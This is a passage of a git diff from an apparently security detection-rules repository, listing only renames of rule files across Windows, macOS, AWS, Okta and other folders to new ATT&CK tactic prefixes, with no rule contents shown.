credential_access_multiple_user_agent_os_authentication.toml} (100%) rename rules/integrations/okta/{defense_evasion_okta_aitm_session_cookie_replay.toml => credential_access_okta_aitm_session_cookie_replay.toml} (100%) rename rules/integrations/okta/{defense_evasion_user_impersonation_access.toml => credential_access_user_impersonation_access.toml} (100%) rename rules/integrations/okta/{initial_access_suspicious_okta_user_password_reset_or_unlock_attempts.toml => defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml} (100%) rename rules/integrations/okta/{defense_evasion_okta_attempt_to_deactivate_okta_application.toml => impact_okta_attempt_to_deactivate_okta_application.toml} (100%) rename 
rules/integrations/okta/{defense_evasion_okta_attempt_to_modify_okta_application.toml => impact_okta_attempt_to_modify_okta_application.toml} (100%) rename rules/integrations/okta/{defense_evasion_sign_in_events_via_third_party_idp.toml => initial_access_sign_in_events_via_third_party_idp.toml} (100%) rename rules/integrations/okta/{defense_evasion_successful_application_sso_from_unknown_client_device.toml => initial_access_successful_application_sso_from_unknown_client_device.toml} (100%) rename rules/integrations/okta/{defense_evasion_multiple_sessions_for_single_user.toml => lateral_movement_multiple_sessions_for_single_user.toml} (100%) rename rules/integrations/okta/{defense_evasion_mfa_deactivation_with_no_reactivation.toml => persistence_mfa_deactivation_with_no_reactivation.toml} (100%) rename rules/integrations/okta/{defense_evasion_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml => persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml} (100%) rename rules/integrations/okta/{defense_evasion_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml => persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml} (100%) rename rules/macos/{execution_perl_outbound_network_connection.toml => command_and_control_perl_outbound_network_connection.toml} (100%) rename rules/macos/{collection_high_volume_of_pbpaste.toml => credential_access_high_volume_of_pbpaste.toml} (100%) rename rules/macos/{collection_suspicious_tcc_access_granted.toml => defense_evasion_suspicious_tcc_access_granted.toml} (100%) rename rules/macos/{defense_evasion_suspicious_sip_check.toml => discovery_suspicious_sip_check.toml} (100%) rename rules/macos/{command_and_control_installer_package_spawned_network_event.toml => execution_installer_package_spawned_network_event.toml} (100%) rename rules/macos/{command_and_control_scripting_osascript_exec_followed_by_netcon.toml => 
execution_scripting_osascript_exec_followed_by_netcon.toml} (100%) rename rules/macos/{execution_suspicious_mac_ms_office_child_process.toml => initial_access_suspicious_mac_ms_office_child_process.toml} (100%) rename rules/macos/{persistence_remote_ssh_login_enabled.toml => lateral_movement_remote_ssh_login_enabled.toml} (100%) rename rules/macos/{initial_access_vpn_connection_attempt.toml => lateral_movement_vpn_connection_attempt.toml} (100%) rename rules/macos/{defense_evasion_account_creation_hide_at_logon.toml => persistence_account_creation_hide_at_logon.toml} (100%) rename rules/macos/{command_and_control_curl_execution_via_shell_profile.toml => persistence_curl_execution_via_shell_profile.toml} (100%) rename rules/macos/{defense_evasion_evasion_hidden_launch_agent_deamon_creation.toml => persistence_evasion_hidden_launch_agent_deamon_creation.toml} (100%) rename rules/macos/{defense_evasion_hidden_plist_filename.toml => persistence_hidden_plist_filename.toml} (100%) rename rules/macos/{execution_applescript_with_admin_privs.toml => privilege_escalation_applescript_with_admin_privs.toml} (100%) rename rules/macos/{execution_explicit_creds_via_scripting.toml => privilege_escalation_explicit_creds_via_scripting.toml} (100%) rename rules/macos/{persistence_local_user_added_to_admin.toml => privilege_escalation_local_user_added_to_admin.toml} (100%) rename rules/macos/{persistence_root_crontab_filemod.toml => privilege_escalation_root_crontab_filemod.toml} (100%) rename rules/macos/{persistence_user_added_to_admin_group.toml => privilege_escalation_user_added_to_admin_group.toml} (100%) rename rules/ml/{defense_evasion_ml_windows_anomalous_script.toml => execution_ml_windows_anomalous_script.toml} (100%) rename rules/ml/{execution_ml_rare_process_by_host_linux.toml => persistence_ml_rare_process_by_host_linux.toml} (100%) rename rules/ml/{execution_ml_windows_anomalous_path_activity.toml => persistence_ml_windows_anomalous_path_activity.toml} (100%) rename 
rules/ml/{execution_ml_windows_anomalous_process_creation.toml => persistence_ml_windows_anomalous_process_creation.toml} (100%) rename rules/network/{initial_access_accepted_default_telnet_port_connection.toml => command_and_control_accepted_default_telnet_port_connection.toml} (100%) rename rules/network/{initial_access_rdp_remote_desktop_protocol_from_the_internet.toml => command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml} (100%) rename rules/network/{initial_access_vnc_virtual_network_computing_from_the_internet.toml => command_and_control_vnc_virtual_network_computing_from_the_internet.toml} (100%) rename rules/network/{execution_react_server_components_rce_attempt.toml => initial_access_react_server_components_rce_attempt.toml} (100%) rename rules/network/{command_and_control_rpc_remote_procedure_call_to_the_internet.toml => initial_access_rpc_remote_procedure_call_to_the_internet.toml} (100%) rename rules/network/{exfiltration_smb_windows_file_sharing_activity_to_the_internet.toml => initial_access_smb_windows_file_sharing_activity_to_the_internet.toml} (100%) rename rules/network/{reconnaissance_unsecure_elasticsearch_node.toml => initial_access_unsecure_elasticsearch_node.toml} (100%) rename rules/promotions/{defense_evasion_endgame_cred_manipulation_detected.toml => privilege_escalation_endgame_cred_manipulation_detected.toml} (100%) rename rules/promotions/{defense_evasion_endgame_cred_manipulation_prevented.toml => privilege_escalation_endgame_cred_manipulation_prevented.toml} (100%) rename rules/promotions/{defense_evasion_endgame_permission_theft_detected.toml => privilege_escalation_endgame_permission_theft_detected.toml} (100%) rename rules/promotions/{defense_evasion_endgame_permission_theft_prevented.toml => privilege_escalation_endgame_permission_theft_prevented.toml} (100%) rename rules/promotions/{defense_evasion_endgame_process_injection_detected.toml => privilege_escalation_endgame_process_injection_detected.toml} (100%) 
rename rules/promotions/{defense_evasion_endgame_process_injection_prevented.toml => privilege_escalation_endgame_process_injection_prevented.toml} (100%) rename rules/windows/{persistence_outlook_home_page.toml => command_and_control_outlook_home_page.toml} (100%) rename rules/windows/{collection_adidns_wildcard.toml => credential_access_adidns_wildcard.toml} (100%) rename rules/windows/{collection_browsers_unusual_parent.toml => credential_access_browsers_unusual_parent.toml} (100%) rename rules/windows/{persistence_dcsync_user_backdoor.toml => credential_access_dcsync_user_backdoor.toml} (100%) rename rules/windows/{collection_dnsnode_creation.toml => credential_access_dnsnode_creation.toml} (100%) rename rules/windows/{persistence_lsass_loaded_susp_dll.toml => credential_access_lsass_loaded_susp_dll.toml} (100%) rename rules/windows/{persistence_seenabledelegationprivilege_assigned_to_user.toml => credential_access_seenabledelegationprivilege_assigned_to_user.toml} (100%) rename rules/windows/{persistence_shadow_credentials.toml => credential_access_shadow_credentials.toml} (100%) rename rules/windows/{persistence_spn_attribute_modified.toml => credential_access_spn_attribute_modified.toml} (100%) rename rules/windows/{collection_web_config_file_access.toml => credential_access_web_config_file_access.toml} (100%) rename rules/windows/{persistence_masquerading_suspicious_werfault_childproc.toml => defense_evasion_masquerading_suspicious_werfault_childproc.toml} (100%) rename rules/windows/{command_and_control_msiexec_remote_payload.toml => defense_evasion_msiexec_remote_payload.toml} (100%) rename rules/windows/{persistence_regmod_remotemonologue.toml => defense_evasion_regmod_remotemonologue.toml} (100%) rename rules/windows/{persistence_scheduledjobs_at_protocol_enabled.toml => defense_evasion_scheduledjobs_at_protocol_enabled.toml} (100%) rename rules/windows/{command_and_control_suspicious_certutil_commands.toml => 
defense_evasion_suspicious_certutil_commands.toml} (100%) rename rules/windows/{execution_suspicious_process_access_direct_syscall.toml => defense_evasion_suspicious_process_access_direct_syscall.toml} (100%) rename rules/windows/{execution_suspicious_zoom_child_process.toml => defense_evasion_suspicious_zoom_child_process.toml} (100%) rename rules/windows/{command_and_control_unusual_network_connection_via_dllhost.toml => defense_evasion_unusual_network_connection_via_dllhost.toml} (100%) rename rules/windows/{command_and_control_unusual_network_connection_via_rundll32.toml => defense_evasion_unusual_network_connection_via_rundll32.toml} (100%) rename rules/windows/{execution_wsl_bash_exec.toml => defense_evasion_wsl_bash_exec.toml} (100%) rename rules/windows/{defense_evasion_com_object_xwizard.toml => execution_com_object_xwizard.toml} (100%) rename rules/windows/{command_and_control_command_prompt_connecting_to_the_internet.toml => execution_command_prompt_connecting_to_the_internet.toml} (100%) rename rules/windows/{defense_evasion_command_shell_via_rundll32.toml => execution_command_shell_via_rundll32.toml} (100%) rename rules/windows/{defense_evasion_delayed_via_ping_lolbas_unsigned.toml => execution_delayed_via_ping_lolbas_unsigned.toml} (100%) rename rules/windows/{initial_access_downloaded_shortcut_files.toml => execution_downloaded_shortcut_files.toml} (100%) rename rules/windows/{initial_access_downloaded_url_file.toml => execution_downloaded_url_file.toml} (100%) rename rules/windows/{discovery_enumeration_via_wmiprvse.toml => execution_enumeration_via_wmiprvse.toml} (100%) rename rules/windows/{defense_evasion_from_unusual_path_cmdline.toml => execution_from_unusual_path_cmdline.toml} (100%) rename rules/windows/{defense_evasion_html_help_executable_program_connecting_to_the_internet.toml => execution_html_help_executable_program_connecting_to_the_internet.toml} (100%) rename rules/windows/{credential_access_posh_hacktool_functions.toml => 
execution_posh_hacktool_functions.toml} (100%) rename rules/windows/{defense_evasion_posh_portable_executable.toml => execution_posh_portable_executable.toml} (100%) rename rules/windows/{defense_evasion_register_server_program_connecting_to_the_internet.toml => execution_register_server_program_connecting_to_the_internet.toml} (100%) rename rules/windows/{command_and_control_revshell_cmd_via_netcat.toml => execution_revshell_cmd_via_netcat.toml} (100%) rename rules/windows/{command_and_control_scripting_remote_webdav.toml => execution_scripting_remote_webdav.toml} (100%) rename rules/windows/{persistence_shared_modules_local_sxs_dll.toml => execution_shared_modules_local_sxs_dll.toml} (100%) rename rules/windows/{defense_evasion_suspicious_psexesvc.toml => execution_suspicious_psexesvc.toml} (100%) rename rules/windows/{defense_evasion_via_compiled_html_file.toml => execution_via_compiled_html_file.toml} (100%) rename rules/windows/{defense_evasion_via_hidden_shell_conhost.toml => execution_via_hidden_shell_conhost.toml} (100%) rename rules/windows/{defense_evasion_via_mmc_console_file_unusual_path.toml => execution_via_mmc_console_file_unusual_path.toml} (100%) rename rules/windows/{defense_evasion_windows_cmd_shell_susp_args.toml => execution_windows_cmd_shell_susp_args.toml} (100%) rename rules/windows/{defense_evasion_windows_fakecaptcha_cmd_ps.toml => execution_windows_fakecaptcha_cmd_ps.toml} (100%) rename rules/windows/{defense_evasion_windows_powershell_susp_args.toml => execution_windows_powershell_susp_args.toml} (100%) rename rules/windows/{defense_evasion_windows_script_from_internet.toml => execution_windows_script_from_internet.toml} (100%) rename rules/windows/{credential_access_smb_rare_destination.toml => exfiltration_smb_rare_destination.toml} (100%) rename rules/windows/{execution_volume_shadow_copy_deletion_via_powershell.toml => impact_volume_shadow_copy_deletion_via_powershell.toml} (100%) rename 
rules/windows/{execution_volume_shadow_copy_deletion_via_wmic.toml => impact_volume_shadow_copy_deletion_via_wmic.toml} (100%) rename rules/windows/{defense_evasion_evasion_suspicious_htm_file_creation.toml => initial_access_evasion_suspicious_htm_file_creation.toml} (100%) rename rules/windows/{defense_evasion_exploit_jetbrains_teamcity.toml => initial_access_exploit_jetbrains_teamcity.toml} (100%) rename rules/windows/{defense_evasion_potential_webhelpdesk_exploit.toml => initial_access_potential_webhelpdesk_exploit.toml} (100%) rename rules/windows/{execution_rdp_file_mail_attachment.toml => initial_access_rdp_file_mail_attachment.toml} (100%) rename rules/windows/{execution_script_executing_powershell.toml => initial_access_script_executing_powershell.toml} (100%) rename rules/windows/{execution_scripts_process_started_via_wmi.toml => initial_access_scripts_process_started_via_wmi.toml} (100%) rename rules/windows/{defense_evasion_suspicious_execution_from_vscode_extension.toml => initial_access_suspicious_execution_from_vscode_extension.toml} (100%) rename rules/windows/{execution_suspicious_ms_exchange_worker_child_process.toml => initial_access_suspicious_ms_exchange_worker_child_process.toml} (100%) rename rules/windows/{defense_evasion_suspicious_ms_office_child_process.toml => initial_access_suspicious_ms_office_child_process.toml} (100%) rename rules/windows/{execution_suspicious_ms_outlook_child_process.toml => initial_access_suspicious_ms_outlook_child_process.toml} (100%) rename rules/windows/{defense_evasion_suspicious_windows_server_update_svc.toml => initial_access_suspicious_windows_server_update_svc.toml} (100%) rename rules/windows/{defense_evasion_url_cve_2025_33053.toml => initial_access_url_cve_2025_33053.toml} (100%) rename rules/windows/{execution_via_explorer_suspicious_child_parent_args.toml => initial_access_via_explorer_suspicious_child_parent_args.toml} (100%) rename rules/windows/{execution_webshell_screenconnect_server.toml => 
initial_access_webshell_screenconnect_server.toml} (100%) rename rules/windows/{defense_evasion_xsl_script_execution_via_com.toml => initial_access_xsl_script_execution_via_com.toml} (100%) rename rules/windows/{defense_evasion_alternate_creds_pth.toml => lateral_movement_alternate_creds_pth.toml} (100%) rename rules/windows/{execution_cmd_service.toml => lateral_movement_cmd_service.toml} (100%) rename rules/windows/{defense_evasion_dcom_mmc20.toml => lateral_movement_dcom_mmc20.toml} (100%) rename rules/windows/{execution_dcom_shellwindow_shellbrowserwindow.toml => lateral_movement_dcom_shellwindow_shellbrowserwindow.toml} (100%) rename rules/windows/{execution_incoming_wmi.toml => lateral_movement_incoming_wmi.toml} (100%) rename rules/windows/{defense_evasion_rdp_enabled_registry.toml => lateral_movement_rdp_enabled_registry.toml} (100%) rename rules/windows/{execution_remote_services.toml => lateral_movement_remote_services.toml} (100%) rename rules/windows/{execution_remote_task_creation_winlog.toml => lateral_movement_remote_task_creation_winlog.toml} (100%) rename rules/windows/{execution_scheduled_task_target.toml => lateral_movement_scheduled_task_target.toml} (100%) rename rules/windows/{initial_access_unusual_dns_service_children.toml => lateral_movement_unusual_dns_service_children.toml} (100%) rename rules/windows/{initial_access_unusual_dns_service_file_writes.toml => lateral_movement_unusual_dns_service_file_writes.toml} (100%) rename rules/windows/{execution_via_wsus_update.toml => lateral_movement_via_wsus_update.toml} (100%) rename rules/windows/{defense_evasion_evasion_hidden_local_account_creation.toml => persistence_evasion_hidden_local_account_creation.toml} (100%) rename rules/windows/{defense_evasion_evasion_registry_startup_shell_folder_modified.toml => persistence_evasion_registry_startup_shell_folder_modified.toml} (100%) rename rules/windows/{defense_evasion_msi_installer_task_startup.toml => persistence_msi_installer_task_startup.toml} 
(100%) rename rules/windows/{defense_evasion_sdprop_exclusion_dsheuristics.toml => persistence_sdprop_exclusion_dsheuristics.toml} (100%) rename rules/windows/{defense_evasion_services_registry.toml => persistence_services_registry.toml} (100%) rename rules/windows/{execution_suspicious_scheduled_task_runtime.toml => persistence_suspicious_scheduled_task_runtime.toml} (100%) rename rules/windows/{execution_system_shells_via_services.toml => persistence_system_shells_via_services.toml} (100%) rename rules/windows/{execution_temp_scheduled_task.toml => persistence_temp_scheduled_task.toml} (100%) rename rules/windows/{defense_evasion_via_bits_job_notify_command.toml => persistence_via_bits_job_notify_command.toml} (100%) rename rules/windows/{defense_evasion_via_hidden_run_key_valuename.toml => persistence_via_hidden_run_key_valuename.toml} (100%) rename rules/windows/{execution_via_wmi_stdregprov_run_services.toml => persistence_via_wmi_stdregprov_run_services.toml} (100%) rename rules/windows/{execution_via_xp_cmdshell_mssql_stored_procedure.toml => persistence_via_xp_cmdshell_mssql_stored_procedure.toml} (100%) rename rules/windows/{execution_webshell_detection.toml => persistence_webshell_detection.toml} (100%) rename rules/windows/{initial_access_account_takeover_mixed_logon_types.toml => privilege_escalation_account_takeover_mixed_logon_types.toml} (100%) rename rules/windows/{persistence_badsuccessor_dmsa_abuse.toml => privilege_escalation_badsuccessor_dmsa_abuse.toml} (100%) rename rules/windows/{defense_evasion_create_process_as_different_user.toml => privilege_escalation_create_process_as_different_user.toml} (100%) rename rules/windows/{defense_evasion_create_process_with_token_unpriv.toml => privilege_escalation_create_process_with_token_unpriv.toml} (100%) rename rules/windows/{persistence_credroaming_ldap.toml => privilege_escalation_credroaming_ldap.toml} (100%) rename rules/windows/{defense_evasion_disable_uac_registry.toml => 
privilege_escalation_disable_uac_registry.toml} (100%) rename rules/windows/{persistence_dmsa_creation_by_unusual_user.toml => privilege_escalation_dmsa_creation_by_unusual_user.toml} (100%) rename rules/windows/{persistence_dns_serverlevelplugindll.toml => privilege_escalation_dns_serverlevelplugindll.toml} (100%) rename rules/windows/{defense_evasion_expired_driver_loaded.toml => privilege_escalation_expired_driver_loaded.toml} (100%) rename rules/windows/{persistence_gpo_schtask_service_creation.toml => privilege_escalation_gpo_schtask_service_creation.toml} (100%) rename rules/windows/{persistence_group_policy_iniscript.toml => privilege_escalation_group_policy_iniscript.toml} (100%) rename rules/windows/{execution_group_policy_scheduled_task.toml => privilege_escalation_group_policy_scheduled_task.toml} (100%) rename rules/windows/{defense_evasion_krbrelayup_service_creation.toml => privilege_escalation_krbrelayup_service_creation.toml} (100%) rename rules/windows/{persistence_lsa_auth_package.toml => privilege_escalation_lsa_auth_package.toml} (100%) rename rules/windows/{defense_evasion_make_token_local.toml => privilege_escalation_make_token_local.toml} (100%) rename rules/windows/{defense_evasion_newcreds_logon_rare_process.toml => privilege_escalation_newcreds_logon_rare_process.toml} (100%) rename rules/windows/{persistence_port_monitor_print_processor_abuse.toml => privilege_escalation_port_monitor_print_processor_abuse.toml} (100%) rename rules/windows/{defense_evasion_posh_token_impersonation.toml => privilege_escalation_posh_token_impersonation.toml} (100%) rename rules/windows/{defense_evasion_printspooler_suspicious_file_deletion.toml => privilege_escalation_printspooler_suspicious_file_deletion.toml} (100%) rename rules/windows/{persistence_reg_service_imagepath_mod.toml => privilege_escalation_reg_service_imagepath_mod.toml} (100%) rename rules/windows/{execution_service_control_spawned_script_int.toml => 
privilege_escalation_service_control_spawned_script_int.toml} (100%) rename rules/windows/{initial_access_takeover_new_source_ip.toml => privilege_escalation_takeover_new_source_ip.toml} (100%) rename rules/windows/{defense_evasion_tokenmanip_sedebugpriv_enabled.toml => privilege_escalation_tokenmanip_sedebugpriv_enabled.toml} (100%) rename rules/windows/{defense_evasion_uac_bypass_com_clipup.toml => privilege_escalation_uac_bypass_com_clipup.toml} (100%) rename rules/windows/{defense_evasion_uac_bypass_com_ieinstal.toml => privilege_escalation_uac_bypass_com_ieinstal.toml} (100%) rename rules/windows/{defense_evasion_uac_bypass_com_interface_icmluautil.toml => privilege_escalation_uac_bypass_com_interface_icmluautil.toml} (100%) rename rules/windows/{defense_evasion_uac_bypass_diskcleanup_hijack.toml => privilege_escalation_uac_bypass_diskcleanup_hijack.toml} (100%) rename rules/windows/{defense_evasion_uac_bypass_dll_sideloading.toml => privilege_escalation_uac_bypass_dll_sideloading.toml} (100%) rename rules/windows/{defense_evasion_uac_bypass_event_viewer.toml => privilege_escalation_uac_bypass_event_viewer.toml} (100%) rename rules/windows/{defense_evasion_uac_bypass_mock_windir.toml => privilege_escalation_uac_bypass_mock_windir.toml} (100%) rename rules/windows/{defense_evasion_uac_bypass_winfw_mmc_hijack.toml => privilege_escalation_uac_bypass_winfw_mmc_hijack.toml} (100%) rename rules/windows/{defense_evasion_unusual_parentchild_relationship.toml => privilege_escalation_unusual_parentchild_relationship.toml} (100%) rename rules/windows/{defense_evasion_unusual_svchost_childproc_childless.toml => privilege_escalation_unusual_svchost_childproc_childless.toml} (100%) rename rules/windows/{defense_evasion_via_token_theft.toml => privilege_escalation_via_token_theft.toml} (100%) rename rules/windows/{persistence_windows_service_via_unusual_client.toml => privilege_escalation_windows_service_via_unusual_client.toml} (100%) rename 
rules_building_block/{defense_evasion_bitsadmin_activity.toml => command_and_control_bitsadmin_activity.toml} (100%) rename rules_building_block/{initial_access_entra_id_risk_detection_signal.toml => credential_access_entra_id_risk_detection_signal.toml} (100%) rename rules_building_block/{defense_evasion_mdmp_file_unusual_extension.toml => credential_access_mdmp_file_unusual_extension.toml} (100%) rename rules_building_block/{execution_download_susp_extension.toml => defense_evasion_download_susp_extension.toml} (100%) rename rules_building_block/{execution_injection_from_msoffice.toml => defense_evasion_injection_from_msoffice.toml} (100%) rename rules_building_block/{execution_outlook_suspicious_child.toml => defense_evasion_outlook_suspicious_child.toml} (100%) rename rules_building_block/{persistence_service_path_registry.toml => defense_evasion_service_path_registry.toml} (100%) rename rules_building_block/{persistence_services_exe_path.toml => defense_evasion_services_exe_path.toml} (100%) rename rules_building_block/{persistence_write_dac_access.toml => defense_evasion_write_dac_access.toml} (100%) rename rules_building_block/{credential_access_capnetraw_capability.toml => discovery_capnetraw_capability.toml} (100%) rename rules_building_block/{persistence_linux_modprobe_enumeration.toml => discovery_linux_modprobe_enumeration.toml} (100%) rename rules_building_block/{defense_evasion_linux_sysctl_enumeration.toml => discovery_linux_sysctl_enumeration.toml} (100%) rename rules_building_block/{persistence_github_new_event_action_for_pat.toml => execution_github_new_event_action_for_pat.toml} (100%) rename rules_building_block/{collection_github_new_repo_interaction_for_pat.toml => execution_github_new_repo_interaction_for_pat.toml} (100%) rename rules_building_block/{collection_github_new_repo_interaction_for_user.toml => execution_github_new_repo_interaction_for_user.toml} (100%) rename rules_building_block/{resource_development_github_repo_created.toml => 
execution_github_repo_created.toml} (100%) rename rules_building_block/{collection_github_repo_interaction_from_new_ip.toml => execution_github_repo_interaction_from_new_ip.toml} (100%) rename rules_building_block/{defense_evasion_settingcontent_ms_file_creation.toml => execution_settingcontent_ms_file_creation.toml} (100%) rename rules_building_block/{execution_anomalous_rsc_flight_data_patterns.toml => initial_access_anomalous_rsc_flight_data_patterns.toml} (100%) rename rules_building_block/{defense_evasion_github_new_ip_address_for_pat.toml => initial_access_github_new_ip_address_for_pat.toml} (100%) rename rules_building_block/{credential_access_okta_admin_console_login_failure.toml => initial_access_okta_admin_console_login_failure.toml} (100%) rename rules_building_block/{execution_at.toml => lateral_movement_at.toml} (100%) rename rules_building_block/{execution_posh_winrm_activity.toml => lateral_movement_posh_winrm_activity.toml} (100%) rename rules_building_block/{execution_unusual_process_sql_accounts.toml => lateral_movement_unusual_process_sql_accounts.toml} (100%) rename rules_building_block/{execution_wmic_remote.toml => lateral_movement_wmic_remote.toml} (100%) rename rules_building_block/{defense_evasion_github_new_pat_for_user.toml => persistence_github_new_pat_for_user.toml} (100%) rename rules_building_block/{initial_access_web_server_potential_sql_injection.toml => persistence_web_server_potential_sql_injection.toml} (100%) rename rules_building_block/{defense_evasion_sts_getsessiontoken_abuse.toml => privilege_escalation_sts_getsessiontoken_abuse.toml} (100%)
diff --git a/rules/cross-platform/persistence_genai_config_modification.toml b/rules/cross-platform/defense_evasion_genai_config_modification.toml
similarity index 100%
rename from rules/cross-platform/persistence_genai_config_modification.toml
rename to rules/cross-platform/defense_evasion_genai_config_modification.toml
diff --git a/rules/cross-platform/resource_development_genai_process_compiling_executables.toml b/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml
similarity index 100%
rename from rules/cross-platform/resource_development_genai_process_compiling_executables.toml
rename to rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml
diff --git a/rules/cross-platform/collection_genai_process_encoding_prior_to_network_activity.toml b/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml
similarity index 100%
rename from rules/cross-platform/collection_genai_process_encoding_prior_to_network_activity.toml
rename to rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml
diff --git a/rules/cross-platform/defense_evasion_virtual_machine_fingerprinting_grep.toml b/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml
similarity index 100%
rename from rules/cross-platform/defense_evasion_virtual_machine_fingerprinting_grep.toml
rename to rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml
diff --git a/rules/cross-platform/collection_azure_o365_with_network_alert.toml b/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml
similarity index 100%
rename from rules/cross-platform/collection_azure_o365_with_network_alert.toml
rename to rules/cross-platform/initial_access_azure_o365_with_network_alert.toml
diff --git a/rules/cross-platform/initial_access_web_server_potential_command_injection.toml b/rules/cross-platform/persistence_web_server_potential_command_injection.toml
similarity index 100%
rename from rules/cross-platform/initial_access_web_server_potential_command_injection.toml
rename to rules/cross-platform/persistence_web_server_potential_command_injection.toml
diff --git a/rules/cross-platform/persistence_trap_execution.toml b/rules/cross-platform/privilege_escalation_trap_execution.toml
similarity index 100%
rename from rules/cross-platform/persistence_trap_execution.toml
rename to rules/cross-platform/privilege_escalation_trap_execution.toml
diff --git a/rules/integrations/aws/defense_evasion_cloudtrail_logging_created.toml b/rules/integrations/aws/collection_cloudtrail_logging_created.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_cloudtrail_logging_created.toml
rename to rules/integrations/aws/collection_cloudtrail_logging_created.toml
diff --git a/rules/integrations/aws/persistence_iam_user_addition_to_group.toml b/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml
similarity index 100%
rename from rules/integrations/aws/persistence_iam_user_addition_to_group.toml
rename to rules/integrations/aws/credential_access_iam_user_addition_to_group.toml
diff --git a/rules/integrations/aws/collection_rds_instance_restored.toml b/rules/integrations/aws/defense_evasion_rds_instance_restored.toml
similarity index 100%
rename from rules/integrations/aws/collection_rds_instance_restored.toml
rename to rules/integrations/aws/defense_evasion_rds_instance_restored.toml
diff --git a/rules/integrations/aws/impact_s3_bucket_lifecycle_expiration_added.toml b/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml
similarity index 100%
rename from rules/integrations/aws/impact_s3_bucket_lifecycle_expiration_added.toml
rename to rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml
diff --git a/rules/integrations/aws/impact_sqs_purge_queue.toml b/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml
similarity index 100%
rename from rules/integrations/aws/impact_sqs_purge_queue.toml
rename to rules/integrations/aws/defense_evasion_sqs_purge_queue.toml
diff --git a/rules/integrations/aws/persistence_sts_get_federation_token.toml b/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml
similarity index 100%
rename from rules/integrations/aws/persistence_sts_get_federation_token.toml
rename to rules/integrations/aws/defense_evasion_sts_get_federation_token.toml
diff --git a/rules/integrations/aws/defense_evasion_lambda_external_layer_added_to_function.toml b/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_lambda_external_layer_added_to_function.toml
rename to rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml
diff --git a/rules/integrations/aws/collection_dynamodb_scan_by_unusual_user.toml b/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml
similarity index 100%
rename from rules/integrations/aws/collection_dynamodb_scan_by_unusual_user.toml
rename to rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml
diff --git a/rules/integrations/aws/discovery_ec2_full_network_packet_capture_detected.toml b/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml
similarity index 100%
rename from rules/integrations/aws/discovery_ec2_full_network_packet_capture_detected.toml
rename to rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml
diff --git a/rules/integrations/aws/collection_rds_snapshot_export.toml b/rules/integrations/aws/exfiltration_rds_snapshot_export.toml
similarity index 100%
rename from rules/integrations/aws/collection_rds_snapshot_export.toml
rename to rules/integrations/aws/exfiltration_rds_snapshot_export.toml
diff --git a/rules/integrations/aws/persistence_s3_bucket_policy_added_for_external_account_access.toml b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml
similarity index 100%
rename from rules/integrations/aws/persistence_s3_bucket_policy_added_for_external_account_access.toml
rename to rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml
diff --git a/rules/integrations/aws/defense_evasion_s3_bucket_policy_added_for_public_access.toml b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_s3_bucket_policy_added_for_public_access.toml
rename to rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml
diff --git a/rules/integrations/aws/defense_evasion_aws_eventbridge_rule_disabled_or_deleted.toml b/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_aws_eventbridge_rule_disabled_or_deleted.toml
rename to rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml
diff --git a/rules/integrations/aws/discovery_aws_s3_bucket_enumeration_or_brute_force.toml b/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml
similarity index 100%
rename from rules/integrations/aws/discovery_aws_s3_bucket_enumeration_or_brute_force.toml
rename to rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml
diff --git a/rules/integrations/aws/defense_evasion_cloudtrail_logging_updated.toml b/rules/integrations/aws/impact_cloudtrail_logging_updated.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_cloudtrail_logging_updated.toml
rename to rules/integrations/aws/impact_cloudtrail_logging_updated.toml
diff --git a/rules/integrations/aws/defense_evasion_cloudwatch_log_group_deletion.toml b/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_cloudwatch_log_group_deletion.toml
rename to rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml
diff --git a/rules/integrations/aws/defense_evasion_cloudwatch_log_stream_deletion.toml b/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_cloudwatch_log_stream_deletion.toml
rename to rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml
diff --git a/rules/integrations/aws/defense_evasion_ec2_disable_ebs_encryption.toml b/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_ec2_disable_ebs_encryption.toml
rename to rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml
diff --git a/rules/integrations/aws/defense_evasion_iam_deactivate_mfa_device.toml b/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml
similarity index 100%
